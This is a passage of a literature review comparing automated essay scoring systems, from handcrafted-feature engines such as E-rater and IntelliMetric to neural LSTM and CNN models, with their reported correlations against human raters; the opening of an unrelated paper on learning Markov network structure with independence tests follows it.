so (Dikli, 2006; Landauer, 2003). E-rater R© Educational Testing Services (ETS) developed E-rater in 1998 to estimate the quality of essays in various assessments. It relies on using a combination of statistical and NLP techniques to extract linguistic features (such as grammar, usage, mechanics, development) from text to start processing, then compares scores with human graded essays (Attali & Burstein, 2014; Dikli, 2006; Ramineni & Williamson, 2018). The E-rater system is upgraded annually. The current version uses 11 features divided into two areas: writing quality (grammar, usage, mechanics, style, organization, development, word choice, average word length, proper prepositions, and collocation usage), and content or use of prompt-specific vocabulary (Ramineni & Williamson, 2018). The E-rater scoring model consists of two stages: the model of the training stage, and the model of the evaluation stage. Human scores are used for training and evaluating the E-rater scoring models. The quality of the E-rater models and its effective functioning in an operational environment depend on the nature and quality of the training and evaluation Hussein et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.208 4/16 https://peerj.com https://doi.org/10.7717/peerjcs.208/fig-1 http://dx.doi.org/10.7717/peerj-cs.208 data (Williamson, Xi & Breyer, 2012). The correlation between human assessors and the system ranged from 0.87 to 0.94 (Refaat, Ewees & Eisa, 2012). CriterionSM Criterion is a web-based scoring and feedback system based on ETS text analysis tools: E- rater R© and Critique. As a text analysis tool, Critique integrates a collection of modules that detect faults in usage, grammar, and mechanics, and recognizes discourse and undesirable style elements in writing. It provides immediate holistic scores as well (Crozier & Kennedy, 1994; Dikli, 2006). Criterion similarly gives personalized diagnostic feedback reports based on the types of assessment instructors give when they comment on students’ writings. This component of the Criterion is called an advisory component. It is added to the score, but it does not control it[18]. The types of feedback the advisory component may provide are like the following: • The text is too brief (a student may write more). • The essay text does not look like other essays on the topic (the essay is off-topic). • The essay text is overly repetitive (student may use more synonyms) (Crozier & Kennedy, 1994). IntelliMetricTM Vantage Learning developed the IntelliMetric systems in 1998. It is considered the first AES system which relies on Artificial Intelligence (AI) to simulate the manual scoring process carried out by human-raters under the traditions of cognitive processing, computational linguistics, and classification (Dikli, 2006; Refaat, Ewees & Eisa, 2012). IntelliMetric relies on using a combination of Artificial Intelligence (AI), Natural Language Processing (NLP) techniques, and statistical techniques. It uses CogniSearch and Quantum Reasoning technologies that were designed to enable IntelliMetric to understand the natural language to support essay scoring (Dikli, 2006). IntelliMetric uses three steps to score essays as follows: a) First, the training step that provides the system with known scores essays. b) Second, the validation step examines the scoring model against a smaller set of known scores essays. c) Finally, application to new essays with unknown scores. (Learning, 2000; Learning, 2003; Shermis & Barrera, 2002) IntelliMetric identifies text related characteristics as larger categories called Latent Semantic Dimensions (LSD). (Figure 2) represents the IntelliMetric features model. IntelliMetric scores essays in several languages including English, French, German, Arabic, Hebrew, Portuguese, Spanish, Dutch, Italian, and Japanese (Elliot, 2003). According to Rudner, Garcia, and Welch (Rudner, Garcia & Welch, 2006), the average of the correlations between IntelliMetric and human-raters was 0.83 (Refaat, Ewees & Eisa, 2012). Hussein et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.208 5/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.208 Figure 2 The IntelliMetric features model. Full-size DOI: 10.7717/peerjcs.208/fig-2 MY Access! MY Access is a web-based writing assessment system based on the IntelliMetric AES system. The primary aim of this system is to provide immediate scoring and diagnostic feedback for the students’ writings in order to motivate them to improve their writing proficiency on the topic (Dikli, 2006). MY Access system contains more than 200 prompts that assist in an immediate analysis of the essay. It can provide personalized Spanish and Chinese feedback on several genres of writing such as narrative, persuasive, and informative essays. Moreover, it provides multilevel feedback—developing, proficient, and advanced—as well (Dikli, 2006; Learning, 2003). Bayesian Essay Test Scoring SystemTM (BETSY) BETSY classifies the text based on trained material. It has been developed in 2002 by Lawrence Rudner at the College Park of the University of Maryland with funds from the US Department of Education (Valenti, Neri & Cucchiarelli, 2017). It has been designed to automate essay scoring, but can be applied to any text classification task (Taylor, 2005). BETSY needs to be trained on a huge number (1,000 texts) of human classified essays to learn how to classify new essays. The goal of the system is to determine the most likely classification of an essay to a set of groups (Pass-Fail) and (Advanced - Proficient - Basic - Below Basic) (Dikli, 2006; Valenti, Neri & Cucchiarelli, 2017). It learns how to classify a new document through the following steps: The first-word training step is concerned with the training of words, evaluating database statistics, eliminating infrequent words, and determining stop words. The second-word pairs training step is concerned with evaluating database statistics, eliminating infrequent word-pairs, maybe scoring the training set, and trimming misclassified training sets. Finally, BETSY can be applied to a set of experimental texts to identify the classification precision for several new texts or a single text. (Dikli, 2006) BETSY has achieved accuracy of over 80%, when trained with 462 essays, and tested with 80 essays (Rudner & Liang, 2002). Hussein et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.208 6/16 https://peerj.com https://doi.org/10.7717/peerjcs.208/fig-2 http://dx.doi.org/10.7717/peerj-cs.208 Figure 3 The architectures of two models. (A) Original C&W model. (B) Augmented C&W model. Full-size DOI: 10.7717/peerjcs.208/fig-3 Figure 4 The example of embeddings. (A) Standard neural embeddings. (B) SSWE word embeddings. Full-size DOI: 10.7717/peerjcs.208/fig-4 Automatic featuring AES systems Automatic text scoring using neural networks Alikaniotis, Yannakoudakis, and Rei introduced in 2016 a deep neural network model capable of learning features automatically to score essays. This model has introduced a novel method to identify the more discriminative regions of the text using: (1) a Score- Specific Word Embedding (SSWE) to represent words and (2) a two-layer Bidirectional Long-Short-Term Memory (LSTM) network to learn essay representations. (Alikaniotis, Yannakoudakis & Rei, 2016; Taghipour & Ng, 2016). Alikaniotis and his colleagues have extended the C&W Embeddings model into the Augmented C&W model to capture, not only the local linguistic environment of each word, but also how each word subsidizes to the overall score of an essay. In order to capture SSWEs. A further linear unit has been added in the output layer of the previous model which performs linear regression, predicting the essay score (Alikaniotis, Yannakoudakis & Rei, 2016). Figure 3 shows the architectures of two models, (A) Original C&W model and (B) Augmented C&W model. Figure 4 shows the example of (A) standard neural embeddings to (B) SSWE word embeddings. Hussein et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.208 7/16 https://peerj.com https://doi.org/10.7717/peerjcs.208/fig-3 https://doi.org/10.7717/peerjcs.208/fig-4 http://dx.doi.org/10.7717/peerj-cs.208 SSWEs obtained by their model used to derive continuous representations for each essay. Each essay is identified as a sequence of tokens. The uni- and bi-directional LSTMs have been efficiently used for embedding long sequences (Alikaniotis, Yannakoudakis & Rei, 2016). They used the Kaggle’s ASAP (https://www.kaggle.com/c/asap-aes/data) contest dataset. It consists of 12.976 essays, with average length 150-to-550 words per essay, each double marked (Cohen’s=0.86). The essays presented eight different prompts, each with distinct marking criteria and score range. Results showed that SSWE and the LSTM approach, without any prior knowledge of the language grammar or the text domain, was able to mark the essays in a very human- like way, beating other state-of-the-art systems. Furthermore, while tuning the models’ hyperparameters on a separate validation set (Alikaniotis, Yannakoudakis & Rei, 2016), they did not perform any further preprocessing of the text other than simple tokenization. Also, it outperforms the traditional SVM model by combining SSWE and LSTM. On the contrary, LSTM alone did not give significant more accuracies compared to SVM. According to Alikaniotis, Yannakoudakis, and Rei (Alikaniotis, Yannakoudakis & Rei, 2016), the combination of SSWE with the two-layer bi-directional LSTM had the highest correlation value on the test set averaged 0.91 (Spearman) and 0.96 (Pearson). A neural network approach to automated essay scoring Taghipour and H. T. Ng developed in 2016 a Recurrent Neural Networks (RNNs) approach which automatically learns the relation between an essay and its grade. Since the system is based on RNNs, it can use non-linear neural layers to identify complex patterns in the data and learn them, and encode all the information required for essay evaluation and scoring (Taghipour & Ng, 2016). The designed model architecture can be presented in five layers as follow: a) The Lookup Table Layer; which builds dLT dimensional space containing each word projection. b) The Convolution Layer; which extracts feature vectors from n-grams. It can possibly capture local contextual dependencies in writing and therefore enhance the performance of the system. c) The Recurrent Layer; which processes the input to generate a representation for the given essay. d) The Mean over Time; which aggregates the variable number of inputs into a fixed length vector. e) The Linear Layer with Sigmoid Activation; which maps the generated output vector from the mean-over-time layer to a scalar value (Taghipour & Ng, 2016). Taghipour and his colleagues have used the Kaggle’s ASAP contest dataset. They distributed the data set into 60% training set, 20% a development set, and 20% a testing set. They used Quadratic Weighted Kappa (QWK) as an evaluation metric. For evaluating the performance of the system, they compared it to an available open source AES system called the ‘Enhanced AI Scoring Engine’ (EASE) (https://github.com/edx/ease). To identify the best model, they performed several experiments like Convolutional vs. Recurrent Hussein et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.208 8/16 https://peerj.com https://www.kaggle.com/c/asap-aes/data https://github.com/edx/ease http://dx.doi.org/10.7717/peerj-cs.208 Neural Network, basic RNN vs. Gated Recurrent Units (GRU) vs. LSTM, unidirectional vs. Bidirectional LSTM, and using with vs. without mean-over-time layer (Taghipour & Ng, 2016). The results showed multiple observations according to (Taghipour & Ng, 2016), summarized as follows: a) RNN failed to get accurate results as LSTM or GRU and the other models outperformed it. This was possibly due to the relatively long sequences of words in writing. b) The neural network performance was significantly affected with the absence of the mean over-time layer. As a result, it did not learn the task in an exceedingly proper manner. c) The best model was the combination of ten instances of LSTM models with ten instances of CNN models. The new model outperformed the baseline EASE system by 5.6% and with averaged QWK value 0.76. Automatic features for essay scoring—an empirical study Dong and Zhang provided in 2016 an empirical study to examine a neural network method to learn syntactic and semantic characteristics automatically for AES, without the need for external pre-processing. They built a hierarchical Convolutional Neural Network (CNN) structure with two levels in order to model sentences separately (Dasgupta et al., 2018; Dong & Zhang, 2016). Dong and his colleague built a model with two parts, summarized as follows: a) Word Representations: A word embedding is used but does not rely on POS-tagging or other pre-processing. b) CNN Model: They took essay scoring as a regression task and employed a two- layer CNN model, in which one Convolutional layer is used to extract sentences representations, and the other is stacked on sentence vectors to learn essays representations. The dataset that they employed in experiments is the Kaggle’s ASAP contest dataset. The settings of data preparation followed the one that Phandi, Chai, and Ng used (Phandi, Chai & Ng, 2015). For domain adaptation (cross-domain) experiments, they followed Phandi, Chai, and Ng (Phandi, Chai & Ng, 2015), by picking four pairs of essay prompts, namely, 1 → 2, 3 →4, 5 →6 and 7 →8, where 1 →2 denotes prompt one as source domain and prompt 2 as target domain. They used quadratic weighted Kappa (QWK) as the evaluation metric. In order to evaluate the performance of the system, they compared it to EASE system (an open source AES available for public) with its both models Bayesian Linear Ridge Regression (BLRR) and Support Vector Regression (SVR). The Empirical results showed that the two-layer Convolutional Neural Network (CNN) outperformed other baselines (e.g., Bayesian Linear Ridge Regression) on both in-domain and domain adaptation experiments on the Kaggle’s ASAP contest dataset. So, the neural features learned by CNN were very effective in essay marking, handling more high-level and abstract information compared to manual feature templates. In domain average, QWK value was 0.73 vs. 0.75 for human rater (Dong & Zhang, 2016). Hussein et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.208 9/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.208 Augmenting textual qualitative features in deep convolution recurrent neural network for automatic essay scoring In 2018, Dasgupta et al. (2018) proposed a Qualitatively enhanced Deep Convolution Recurrent Neural Network architecture to score essays automatically. The model considers both word- and sentence-level representations. Using a Hierarchical CNN connected with a Bidirectional LSTM model they were able to consider linguistic, psychological and cognitive feature embeddings within a text (Dasgupta et al., 2018). The designed model architecture for the linguistically informed Convolution RNN can be presented in five layers as follow: a) Generating Embeddings Layer: The primary function is constructing previously trained sentence vectors. Sentence vectors extracted from every input essay are appended with the formed vector from the linguistic features determined for that sentence. b) Convolution Layer: For a given sequence of vectors with K windows, this layer function is to apply linear transformation for all these K windows. This layer is fed by each of the generated word embeddings from the previous layer. c) Long Short-Term Memory Layer: The main function of this layer is to examine the future and past sequence context by connecting Bidirectional LSTMs (Bi-LSTM) networks. d) Activation layer: The main function of this layer is to obtain the intermediate hidden layers from the Bi-LSTM layer h1, h2,..., h T, and in order to calculate the weights of sentence contribution to the final essay’s score (quality of essay). They used an attention pooling layer over sentence representations. e) The Sigmoid Activation Function Layer: The main function of this layer is to perform a linear transformation of the input vector that converts it to a scalar value (continuous) (Dasgupta et al., 2018). Figure 5 represents the proposed linguistically informed Convolution Recurrent Neural Network architecture. Dasgupta and his colleagues employed in their experiments the Kaggle’s ASAP contest dataset. They have done 7 folds using cross validation technique to assess their models. Every fold is distributed as follows; training set which represents 80% of the data, development set represented by 10%, and the rest 10% as the test set. They used quadratic weighted Kappa (QWK) as the evaluation metric. The results showed that, in terms of all these parameters, the Qualitatively Enhanced Deep Convolution LSTM (Qe-C-LSTM) system performed better than the existing, LSTM, Bi-LSTM and EASE models. It achieved a Pearson’s and Spearman’s correlation of 0.94 and 0.97 respectively as compared to that of 0.91 and 0.96 in Alikaniotis, Yannakoudakis & Rei (2016). They also accomplished an RMSE score of 2.09. They computed a pairwise Cohen’s k value of 0.97 as well (Dasgupta et al., 2018). SUMMARY AND DISCUSSION Over the past four decades, there have been several studies that examined the approaches of applying computer technologies on scoring essay questions. Recently, computer Hussein et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.208 10/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.208 Figure 5 The proposed linguistically informed Convolution Recurrent Neural Network architecture. Full-size DOI: 10.7717/peerjcs.208/fig-5 technologies have been able to assess the quality of writing using AES technology. Many attempts have taken place in developing AES systems in the past years (Dikli, 2006). The AES systems do not assess the intrinsic qualities of an essay directly as human-raters do, but they utilize the correlation coefficients of the intrinsic qualities to predict the score to be assigned to an essay. The performance of these systems is evaluated based on the comparison of the scores assigned to a set of essays scored by expert humans. The AES systems have many strengths mainly in reducing labor-intensive marking activities, overcoming time, cost, and improving the reliability of writing tasks. Besides, they ensure a consistent application of marking criteria, therefore facilitating equity in scoring. However, there is a substantial manual effort involved in reaching these results on different domains, genres, prompts, and so forth. Moreover, the linguistic features intended to capture the aspects of writing to be assessed are hand-selected and tuned for specific domains. In order to perform well on different data, separate models with distinct feature sets are typically tuned (Burstein, 2003; Dikli, 2006; Hamp-Lyons, 2001; Rudner & Gagne, 2001; Rudner & Liang, 2002). Despite its weaknesses, the AES systems continue to attract the attention of public schools, universities, testing agencies, researchers and educators (Dikli, 2006). The AES systems described in this paper under the first category are based on handcrafted features and, usually, rely on regression methods. They employ several methods to obtain the scores. While E-rater and IntelliMetric use NLP techniques, the IEA system utilizes LSA. Moreover, PEG utilizes proxy measures (proxes), and BETSYTM uses Bayesian procedures to evaluate the quality of a text. While E-rater, IntelliMetric, and BETSY evaluate style and semantic content of essays, PEG only evaluates style and ignores the semantic aspect of essays. Furthermore, IEA is exclusively concerned with semantic content. Unlike PEG, E-rater, IntelliMetric, and IEA Hussein et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.208 11/16 https://peerj.com https://doi.org/10.7717/peerjcs.208/fig-5 http://dx.doi.org/10.7717/peerj-cs.208 need smaller numbers of pre-scored essays for training in contrast with BETSY which needs a huge number of training pre-scored essays. The systems in the first category have high correlations with human-raters. While PEG, E-rater, IEA, and BETSY evaluate only English language essay responses, IntelliMetric evaluates essay responses in multiple languages. Contrary to PEG, IEA, and BETSY, E-rater, and IntelliMetric have instructional or immediate feedback applications (i.e., Criterion and MY Access!). Instructional-based AES systems have worked hard to provide formative assessments by allowing students to save their writing drafts on the system. Thus, students can review their writings as of the formative feedback received from either the system or the teacher. The recent version of MY Access! (6.0) provides online portfolios and peer review. The drawbacks of this category may include the following: (a) feature engineering can be time-consuming, since features need to be carefully handcrafted and selected to fit the appropriate model, and (b) such systems are sparse and instantiated by discrete pattern-matching. AES systems described in this paper under the second category are usually based on neural networks. Neural Networking approaches, especially Deep Learning techniques, have been shown to be capable of inducing dense syntactic and semantic features automatically, applying them to text analysis and classification problems including AES systems (Alikaniotis, Yannakoudakis & Rei, 2016; Dong & Zhang, 2016; Taghipour & Ng, 2016), and giving better results with regards to the statistical models used in the handcrafted features (Dong & Zhang, 2016). Recent advances in Deep Learning have shown that neural approaches to AES achieve state-of-the-art results (Alikaniotis, Yannakoudakis & Rei, 2016; Taghipour & Ng, 2016) with the additional advantage of utilizing features that are automatically learned from the data. In order to facilitate interpretability of neural models, a number of visualization techniques have been proposed to identify textual (superficial) features that contribute to model performance [7]. While Alikaniotis and his colleagues (2016) employed a two-layer Bidirectional LSTM combined with the SSWE for essay scoring tasks, Taghipour & Ng (2016) adopted the LSTM model and combined it with CNN. Dong & Zhang (2016) developed a two-layer CNN, and Dasgupta and his colleagues (2018) proposed a Qualitatively Enhanced Deep Convolution LSTM. Unlike Alikaniotis and his colleagues (2016), Taghipour & Ng (2016), Dong & Zhang (2016), Dasgupta and his colleagues (2018) were interested in word-level and sentence-level representations as well as linguistic, cognitive and psychological feature embeddings. All linguistic and qualitative features were figured off-line and then entered in the Deep Learning architecture. Although Deep Learning-based approaches have achieved better performance than the previous approaches, the performance may not be better using the complex linguistic and cognitive characteristics, which are very important in modeling such essays. See Table 1 for the comparison of AES systems. In general, there are three primary challenges to AES systems. First, they are not able to assess essays as human-raters do because they do what they have been programmed to do Hussein et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.208 12/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.208 Table 1 The comparison of AES systems. AES/Parameter Vendor Release date Primary focus Technique(s) used Training data Feedback Applica- tion Correlation with human raters’ scores PEGTM Ellis Page 1966 Style Statistical Yes (100 – 400) No 0.87 IEATM Landauer, Foltz, & Laham 1997 Content LSA (KAT en- gine by PEAR- SON) Yes (∼100) Yes 0.90 E-rater R© ETS development team 1998 Style & Content NLP Yes (∼400) Yes (Crite- rion) ∼0.91 IntelliMetricTM Vantage Learning 1998 Style & Content NLP Yes (∼300) Yes (MY Access!) ∼0.83 BETSYTM Rudner 1998 Style & Content Bayesian text classification Yes (1000) No ∼0.80 Alikaniotis, Yan- nakoudakis & Rei (2016) Alikaniotis, Yan- nakoudakis, and Rei 2016 Style & Content SSWE + Two- layer Bi-LSTM Yes (∼8000) No ∼0.91 (Spear- man)∼0.96 (Pearson) Taghipour & Ng (2016) Taghipour and Ng 2016 Style & Content Adopted LSTM Yes (∼7786) NO QWK for LSTM ∼0.761 Dong & Zhang (2016) Dong and Zhang 2016 Syntactic and seman- tic features Word embed- ding and a two- layer Convo- lution Neural Network Yes (∼1500 to ∼1800) NO average kappa ∼0.734 versus 0.754 for hu- man Dasgupta et al. (2018) Dasgupta, T., Naskar, A., Dey, L., & Saha, R. 2018 Style, Content, lin- guistic and psycho- logical Deep Convolu- tion Recurrent Neural Network Yes ( ∼8000 to 10000) NO Pearson’s and Spearman’s correlation of 0.94 and 0.97 respectively Notes. Scorers. (Page, 2003). They eliminate the human element in writing assessment and lack the sense of the rater as a person (Hamp-Lyons, 2001). This shortcoming was somehow overcome by obtaining high correlations between the computer and human-raters (Page, 2003) although this is still a challenge. The second challenge is whether the computer can be fooled by students or not (Dikli, 2006). It is likely to ‘‘trick’’ the system by writing a longer essay to obtain higher score for example (Kukich, 2000). Studies, such as the GRE study in 2001, examined whether a computer could be deceived and assign a lower or higher score to an essay than it should deserve or not. The results revealed that it might reward a poor essay (Dikli, 2006). The developers of AES systems have been utilizing algorithms to detect students who try to cheat. Although automatic learning AES systems based on Neural Networks algorithms, the handcrafted AES systems transcend automatic learning systems in one important feature. Handcrafted systems are highly related to the scoring rubrics that have been designed as a criterion for assessing a specific essay and human-raters use these rubrics to score essays Hussein et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.208 13/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.208 a well. The objectivity of human-raters is measured by their commitment to the scoring rubrics. On the contrary, automatic learning systems extract the scoring criteria using machine learning and neural networks, which may include some factors that are not part of the scoring rubric, and, hence, is reminiscent of raters’ subjectivity (i.e., mode, nature of a rater’s character, etc.) Considering this point, handcrafted AES systems may be considered as more objective and fairer to students from the viewpoint of educational assessment. The third challenge is measuring the creativity of human writing. Accessing the creativity of ideas and propositions and evaluating their practicality are still a pending challenge to both categories of AES systems which still needs further research. ADDITIONAL INFORMATION AND DECLARATIONS Funding The authors received no funding for this work. Competing Interests The authors declare there are no competing interests. Author Contributions • Mohamed Abdellatif Hussein conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables. • Hesham Hassan and Mohammad Nassef authored or reviewed drafts of the paper, approved the final draft. Data Availability The following information was supplied regarding data availability: As this is a literature, review, there was no raw data. REFERENCES Alikaniotis D, Yannakoudakis H, Rei M. 2016. Automatic text scoring using neural net- works. In: Proceedings of the 54th Annual Meeting of the Association for Computational Linguistics (Volume 1: Long Papers). Stroudsburg: Association for Computational Linguistics, 715–725 DOI 10.18653/v1/P16-1068. Attali Y, Burstein J. 2014. Automated essay scoring with E-Rater R© V.2.0. ETS Research Report Series 2004(2):i–21 DOI 10.1002/j.2333-8504.2004.tb01972.x. Burstein J. 2003. The e-rater scoring engine: automated essay scoring with natural language processing. In: Shermis MD, Burstein J, eds. Automated essay scoring: a cross-disciplinary approach. Mahwah: Lawrence Erlbaum Associates, 113–121. Crozier WW, Kennedy GJA. 1994. Marine exploitation of Atlantic salmon (Salmo salar L.) from the River Bush, Northern Ireland. Fisheries Research 19(1–2):141–155 DOI 10.1016/0165-7836(94)90020-5. Hussein et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.208 14/16 https://peerj.com http://dx.doi.org/10.18653/v1/P16-1068 http://dx.doi.org/10.1002/j.2333-8504.2004.tb01972.x http://dx.doi.org/10.1016/0165-7836(94)90020-5 http://dx.doi.org/10.7717/peerj-cs.208 Dasgupta T, Naskar A, Saha R, Dey L. 2018. Augmenting textual qualitative features in deep convolution recurrent neural network for automatic essay scoring. In: Proceed- ings of the 5th Workshop on Natural Language Processing Techniques for Educational Applications. Melbourne, Australia, July 19, 2018. Stroudsburg: Association for Computational Linguistics, 93–102. Available at http://aclweb.org/anthology/W18- 3713. Dikli S. 2006. An overview of automated scoring of essays. The Journal Of Technology, Learning, and Assessment 5(1):1–36. Dong F, Zhang Y. 2016. Automatic features for essay scoring—an empirical study. In: Proceedings of the 2016 conference on empirical methods in natural language processing. Stroudsburg: Association for Computational Linguistics, 1072–1077 DOI 10.18653/v1/d16-1115. Elliot S. 2003. IntelliMetric: from here to validity. In: Automated essay scoring: a cross- disciplinary perspective. 71–86. Farag Y, Yannakoudakis H, Briscoe T. 2018. Neural automated essay scoring and coherence modeling for adversarially crafted input. In: Proceedings of the 2018 Conference of the North American Chapter of the Association for Computational Linguistics: Human Language Technologies, Volume 1 (Long Papers). Association for Computational Linguistics Louisiana, USA, 263–271 DOI 10.18653/v1/N18-1024. Foltz PW, Gilliam S, Kendall S. 2003. Supporting content-based feedback in on-line writing evaluation with LSA. Interactive Learning Environments 8(2):111–127 DOI 10.1076/1049-4820(200008)8:2;1-b;ft111. Hamp-Lyons L. 2001. Fourth generation writing assessement. In: Silva T, Matsuda PK, eds. On second language writing. Vol. 117. Mahwah: Lawrence Erlbaum, 117–128. Home—Measurement Incorporated. 2019. Available at http://www.measurementinc. com/ (accessed on 5 February 2019). Isaacs T, Zara C, Herbert G, Coombs SJ, Smith C. 2013. Key concepts in educa- tional assessment [electronic resource]. Thousand Oaks: Sage Publications Ltd DOI 10.4135/9781473915077. Kukich K. 2000. Beyond automated essay scoring, the debate on automated essay grading. IEEE Intelligent Systems 15(5):22–27. Landauer TK. 2003. Automatic essay assessment. Assessment in Education: Principles, Policy & Practice 10(3):295–308 DOI 10.1080/0969594032000148154. Learning V. 2000. A true score study of IntelliMetric accuracy for holistic and dimensional scoring of college entry-level writing program (RB-407). Newtown: Vantage Learning. Learning V. 2003. A true score study of 11th grade student writing responses using Intelli- Metric Version 9.0 (RB-786). Newtown: Vantage Learning, 1. Nitko AJ, Brookhart SM. 2007. Educational assessment of students. 5th edition. New Jersey: Pearson Merrill Prentice Hall. Page EB. 1994. Computer grading of student prose, using modern concepts and software. Journal of Experimental Education 62(2):127–142 DOI 10.1080/00220973.1994.9943835. Hussein et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.208 15/16 https://peerj.com http://aclweb.org/anthology/W18-3713 http://aclweb.org/anthology/W18-3713 http://dx.doi.org/10.18653/v1/d16-1115 http://dx.doi.org/10.18653/v1/N18-1024 http://dx.doi.org/10.1076/1049-4820(200008)8:2;1-b;ft111 http://www.measurementinc.com/ http://www.measurementinc.com/ http://dx.doi.org/10.4135/9781473915077 http://dx.doi.org/10.1080/0969594032000148154 http://dx.doi.org/10.1080/00220973.1994.9943835 http://dx.doi.org/10.7717/peerj-cs.208 Page EB. 2003. Project essay grade: PEG. In: Automated essay scoring: a cross-disciplinary perspective. Mahwah: Lawrence Erlbaum Associates Publishers, 43–54. Peng X, Ke D, Xu B. 2012. Automated essay scoring based on finite state transducer: towards ASR transcription of oral English speech. In: Proceedings of the 50th Annual Meeting of the Association for Computational Linguistics: Long Papers-Volume 1. Association for Computational Linguistics, 50–59. Phandi P, Chai KMA, Ng HT. 2015. Flexible domain adaptation for automated essay scoring using correlated linear regression. In: Proceedings of the 2015 Conference on Empirical Methods in Natural Language Processing. Lisbon: Association for Computational Linguistics, 431–439 DOI 10.18653/v1/d15-1049. Ramineni C, Williamson D. 2018. Understanding mean score differences between the e-rater R© automated scoring engine and humans for demographically based groups in the GRE R© general test. ETS Research Report Series 2018(1):1–31 DOI 10.1109/ISIE.1997.648935. Refaat MM, Ewees AA, Eisa MM. 2012. Automated assessment of students’ Arabic free- text answers. International Journal of Intelligent Computing And Information Science 12(1):213–222. Rudner L, Gagne P. 2001. An overview of three approaches to scoring written essays by computer. Practical Assessment, Research & Evaluation 7(26). Rudner LM, Garcia V, Welch C. 2006. An evaluation of the IntelliMetricSM essay scoring system. The Journal of Technology, Learning and Assessment 4(4):3–20. Rudner LM, Liang T. 2002. Automated essay scoring using bayes’ Theorem. The Journal of Technology, Learning, and Assessment 1(2):1–21. Shermis MD, Barrera FD. 2002. Exit assessments evaluating writing ability through automated essay scoring. In: Annual Meeting of the American Educational Research Association, New Orleans, LA, 1–30. Available at https://eric.ed.gov/?id=ED464950. Stecher BM, Rahn M, Ruby A, Alt M, Robyn A, Ward B. 1997. Using alternative assess- ments in vocational education. RAND-Publications-MR-all series. Berkeley: RAND and University of California. Taghipour K, Ng HT. 2016. A neural approach to automated essay scoring. In: Proceedings of the 2016 conference on empirical methods in natural language pro- cessing. Stroudsburg: Association for Computational Linguistics, 1882–1891 DOI 10.18653/v1/d16-1193. Taylor AR. 2005. A future in the process of arrival: using computer technologies for the assessment of student learning. Kelowna: Society for Advancement of Excellence in Education. Valenti S, Neri F, Cucchiarelli A. 2017. An overview of current research on automated essay grading. Journal of Information Technology Education: Research 2:319–330 DOI 10.28945/331. Williamson DM, Xi X, Breyer FJ. 2012. A framework for evaluation and use of automated scoring. Educational Measurement: Issues and Practice 31(1):2–13 DOI 10.1111/j.1745-3992.2011.00223.x. Hussein et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.208 16/16 https://peerj.com http://dx.doi.org/10.18653/v1/d15-1049 http://dx.doi.org/10.1109/ISIE.1997.648935 https://eric.ed.gov/?id=ED464950 http://dx.doi.org/10.18653/v1/d16-1193 http://dx.doi.org/10.28945/331 http://dx.doi.org/10.1111/j.1745-3992.2011.00223.x http://dx.doi.org/10.7717/peerj-cs.208 work_dksywpuce5hyvazldbmanbc62i ---- plot_real.eps Journal of Artificial Intelligence Research 35 (2009) 449-485 Submitted 1/09; published 7/09 Efficient Markov Network Structure Discovery Using Independence Tests Facundo Bromberg fbromberg@frm.utn.edu.ar Departamento de Sistemas de Información, Universidad Tecnológica Nacional, Mendoza, Argentina Dimitris Margaritis dmarg@cs.iastate.edu Vasant Honavar honavar@cs.iastate.edu Dept. of Computer Science, Iowa State University, Ames, IA 50011 Abstract We present two algorithms for learning the structure of a Markov network from data: GSMN∗ and GSIMN. Both algorithms use statistical independence tests to infer the struc- ture by successively constraining the set of structures consistent with the results of these tests. Until very recently, algorithms for structure learning were based on maximum like- lihood estimation, which has been proved to be NP-hard for Markov networks due to the difficulty of estimating the parameters of the network, needed for the computation of the data likelihood. The independence-based approach does not require the computation of the likelihood, and thus both GSMN∗ and GSIMN can compute the structure efficiently (as shown in our experiments). GSMN∗ is an adaptation of the Grow-Shrink algorithm of Margaritis and Thrun for learning the structure of Bayesian networks. GSIMN ex- tends GSMN∗ by additionally exploiting Pearl’s well-known properties of the conditional independence relation to infer novel independences from known ones, thus avoiding the per- formance of statistical tests to estimate them. To accomplish this efficiently GSIMN uses the Triangle theorem, also introduced in this work, which is a simplified version of the set of Markov axioms. Experimental comparisons on artificial and real-world data sets show GSIMN can yield significant savings with respect to GSMN∗, while generating a Markov network with comparable or in some cases improved quality. We also compare GSIMN to a forward-chaining implementation, called GSIMN-FCH, that produces all possible con- ditional independences resulting from repeatedly applying Pearl’s theorems on the known conditional independence tests. The results of this comparison show that GSIMN, by the sole use of the Triangle theorem, is nearly optimal in terms of the set of independences tests that it infers. 1. Introduction Graphical models (Bayesian and Markov networks) are an important subclass of statisti- cal models that possess advantages that include clear semantics and a sound and widely accepted theoretical foundation (probability theory). Graphical models can be used to represent efficiently the joint probability distribution of a domain. They have been used in numerous application domains, ranging from discovering gene expression pathways in bioinformatics (Friedman, Linial, Nachman, & Pe’er, 2000) to computer vision (e.g. Geman c©2009 AI Access Foundation. All rights reserved. Bromberg, Margaritis, & Honavar Figure 1: Example Markov network. The nodes represent variables in the domain V = {0, 1, 2, 3, 4, 5, 6, 7}. & Geman, 1984, Besag, York, & Mollie, 1991, Isard, 2003, Anguelov, Taskar, Chatalbashev, Koller, Gupta, Heitz, & Ng, 2005). One problem that naturally arises is the construction of such models from data (Heckerman, Geiger, & Chickering, 1995, Buntine, 1994). A solution to this problem, besides being theoretically interesting in itself, also holds the potential of advancing the state-of-the-art in application domains where such models are used. In this paper we focus on the task of learning Markov networks (MNs) from data in domains in which all variables are either discrete or continuous and distributed according to a multidimensional Gaussian distribution. MNs are graphical models that consist of two parts: an undirected graph (the model structure), and a set of parameters. An example 